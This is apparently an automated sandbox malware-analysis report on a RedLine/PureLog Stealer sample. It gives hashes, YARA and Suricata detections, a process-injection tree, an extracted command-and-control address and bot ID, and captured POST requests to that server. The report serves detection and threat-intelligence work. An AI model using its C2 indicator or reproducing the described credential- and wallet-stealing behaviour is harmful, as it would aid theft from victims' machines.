Edit tour

Windows Analysis Report
MfzXU6tKOq.exe

Overview

General Information

Sample name:	MfzXU6tKOq.exe renamed because original name is a hash value
Original sample name:	3D63B777F65056B236BA51180CD37CE0.exe
Analysis ID:	1568226
MD5:	3d63b777f65056b236ba51180cd37ce0
SHA1:	94a4653797f942c4f2eb1ac36707d66e5cef401f
SHA256:	d2ddb7d466186ab167e6799198ef76d678ad0ac098a5deacb5a99383aa54b717
Tags:	exeRedLineStealeruser-abuse_ch
Infos:

Detection

PureLog Stealer, RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected PureLog Stealer

Yara detected RedLine Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses known network protocols on non-standard ports

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

MfzXU6tKOq.exe (PID: 1860 cmdline: "C:\Users\user\Desktop\MfzXU6tKOq.exe" MD5: 3D63B777F65056B236BA51180CD37CE0)

RegSvcs.exe (PID: 744 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

conhost.exe (PID: 5332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.222.58.82:55615"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1841259145.0000000004FA0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x1341a:$a4: get_ScannedWallets 0x12278:$a5: get_ScanTelegram 0x1309e:$a6: get_ScanGeckoBrowsersPaths 0x10eba:$a7: <Processes>k__BackingField 0xedcc:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x107ee:$a9: <ScanFTP>k__BackingField
00000000.00000002.1839022362.00000000033F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x142aa:$a4: get_ScannedWallets 0x2c0ca:$a4: get_ScannedWallets 0x13108:$a5: get_ScanTelegram 0x2af28:$a5: get_ScanTelegram 0x13f2e:$a6: get_ScanGeckoBrowsersPaths 0x2bd4e:$a6: get_ScanGeckoBrowsersPaths 0x11d4a:$a7: <Processes>k__BackingField 0x29b6a:$a7: <Processes>k__BackingField 0xfc5c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x27a7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1167e:$a9: <ScanFTP>k__BackingField 0x2949e:$a9: <ScanFTP>k__BackingField
Process Memory Space: MfzXU6tKOq.exe PID: 1860	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MfzXU6tKOq.exe PID: 1860	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: MfzXU6tKOq.exe PID: 1860	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: MfzXU6tKOq.exe PID: 1860	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x18899:$a4: get_ScannedWallets 0x3b3b0:$a4: get_ScannedWallets 0x17740:$a5: get_ScanTelegram 0x3a257:$a5: get_ScanTelegram 0x18522:$a6: get_ScanGeckoBrowsersPaths 0x3b039:$a6: get_ScanGeckoBrowsersPaths 0x163d3:$a7: <Processes>k__BackingField 0x38eea:$a7: <Processes>k__BackingField 0x13906:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x3641d:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x15d07:$a9: <ScanFTP>k__BackingField 0x3881e:$a9: <ScanFTP>k__BackingField
Process Memory Space: RegSvcs.exe PID: 744	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 744	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 744	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0xaf71:$a4: get_ScannedWallets 0x9e18:$a5: get_ScanTelegram 0xabfa:$a6: get_ScanGeckoBrowsersPaths 0x8aab:$a7: <Processes>k__BackingField 0x5fde:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x83df:$a9: <ScanFTP>k__BackingField
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.MfzXU6tKOq.exe.4fa0000.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.MfzXU6tKOq.exe.340e790.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.MfzXU6tKOq.exe.4fa0000.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.MfzXU6tKOq.exe.35dbb00.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.MfzXU6tKOq.exe.35dbb00.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.MfzXU6tKOq.exe.35dbb00.1.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
0.2.MfzXU6tKOq.exe.35dbb00.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ea:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cb:$v2_6: GetUpdates
3.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
3.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
3.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ea:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cb:$v2_6: GetUpdates
0.2.MfzXU6tKOq.exe.35c3ce0.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.MfzXU6tKOq.exe.35c3ce0.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.MfzXU6tKOq.exe.35c3ce0.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
0.2.MfzXU6tKOq.exe.35c3ce0.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ea:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cb:$v2_6: GetUpdates
0.2.MfzXU6tKOq.exe.35dbb00.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.MfzXU6tKOq.exe.35dbb00.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.MfzXU6tKOq.exe.35dbb00.1.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
0.2.MfzXU6tKOq.exe.35dbb00.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ea:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cb:$v2_6: GetUpdates
0.2.MfzXU6tKOq.exe.340e790.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.MfzXU6tKOq.exe.35c3ce0.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.MfzXU6tKOq.exe.35c3ce0.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.MfzXU6tKOq.exe.35c3ce0.0.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x2b3ea:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x2a248:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x2b06e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0x28e8a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x26d9c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField 0x287be:$a9: <ScanFTP>k__BackingField
0.2.MfzXU6tKOq.exe.35c3ce0.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x282aa:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x2b961:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x20f50:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x2ae99:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x284ab:$v2_2: get_ScanVPN 0x2854e:$v2_2: get_ScanFTP
Click to see the 19 entries

Suricata Signatures

ET MALWARE RedLine Stealer - CheckConnect Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-04T13:17:21.706312+0100	2045000	1	Malware Command and Control Activity Detected	185.222.58.82	55615	192.168.2.4	49733	TCP

ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-04T13:17:26.198581+0100	2046056	1	A Network Trojan was detected	185.222.58.82	55615	192.168.2.4	49733	TCP

ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-04T13:17:26.198581+0100	2045001	1	Malware Command and Control Activity Detected	185.222.58.82	55615	192.168.2.4	49733	TCP

ETPRO MALWARE RedLine - CheckConnect Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-04T13:17:16.330585+0100	2849662	1	Malware Command and Control Activity Detected	192.168.2.4	49733	185.222.58.82	55615	TCP

ETPRO MALWARE RedLine - EnvironmentSettings Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-04T13:17:22.355480+0100	2849351	1	Malware Command and Control Activity Detected	192.168.2.4	49733	185.222.58.82	55615	TCP

ETPRO MALWARE RedLine - GetUpdates Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-04T13:17:29.680089+0100	2848200	1	Malware Command and Control Activity Detected	192.168.2.4	49744	185.222.58.82	55615	TCP

ETPRO MALWARE RedLine - SetEnvironment Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-04T13:17:26.832291+0100	2849352	1	Malware Command and Control Activity Detected	192.168.2.4	49741	185.222.58.82	55615	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.MfzXU6tKOq.exe.35dbb00.1.raw.unpack

Malware Configuration Extractor: RedLine {"C2 url": ["185.222.58.82:55615"], "Bot Id": "cheat"}

Multi AV Scanner detection for submitted file

Source: MfzXU6tKOq.exe

ReversingLabs: Detection: 68%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: MfzXU6tKOq.exe

Joe Sandbox ML: detected

Source: MfzXU6tKOq.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: MfzXU6tKOq.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: CWHy.pdb source: MfzXU6tKOq.exe
Source:	Binary string: CWHy.pdbSHA256 source: MfzXU6tKOq.exe

Source: C:\Users\user\Desktop\MfzXU6tKOq.exe

Code function: 4x nop then jmp 06ABE0B0h

0_2_06ABDF7E

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49733 -> 185.222.58.82:55615
Source: Network traffic	Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 185.222.58.82:55615 -> 192.168.2.4:49733
Source: Network traffic	Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49733 -> 185.222.58.82:55615
Source: Network traffic	Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 185.222.58.82:55615 -> 192.168.2.4:49733
Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.222.58.82:55615 -> 192.168.2.4:49733
Source: Network traffic	Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:49741 -> 185.222.58.82:55615
Source: Network traffic	Suricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.4:49744 -> 185.222.58.82:55615

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 185.222.58.82:55615

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49744

Source: global traffic

TCP traffic: 192.168.2.4:49733 -> 185.222.58.82:55615

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.82:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.82:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.82:55615Content-Length: 934597Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.82:55615Content-Length: 934589Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: Joe Sandbox View

ASN Name: ROOTLAYERNETNL ROOTLAYERNETNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.82

Source: global traffic

DNS traffic detected: DNS query: api.ip.sb

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.82:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: RegSvcs.exe, 00000003.00000002.1992867983.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.58.82:5
Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1992867983.0000000002981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.58.82:55615
Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.58.82:55615/
Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.58.82:55615t-kq
Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002870000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
